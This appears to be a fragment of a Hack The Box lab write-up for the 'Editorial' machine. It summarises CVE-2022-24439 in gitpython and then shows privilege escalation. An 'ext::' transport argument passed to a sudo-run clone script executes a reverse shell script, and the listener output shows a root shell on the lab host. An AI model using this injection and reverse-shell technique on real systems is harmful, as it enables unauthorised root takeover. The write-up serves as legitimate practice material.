CVE-2022-24439
A vulnerability has been found in gitpython (Programming Language Software) (version unknown) and classified as problematic. This vulnerability affects an unknown function. The manipulation with an unknown input leads to a input validation vulnerability. The CWE definition for the vulnerability is CWE-20. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. As an impact it is known to affect confidentiality, integrity, and availability.
Exploitation
prod@editorial:/dev/shm$ nano r.sh
I can just create a reverse shell script at /dev/shm/r.sh
prod@editorial:/dev/shm$ sudo -u root /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::/dev/shm/r.sh"and call the reverse shell script via the ext transport protocol.
┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.141] from (UNKNOWN) [10.10.11.20] 34134
# whoami
root
# hostname
editorial
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:20:11 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.20/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:2011/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb9:2011/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise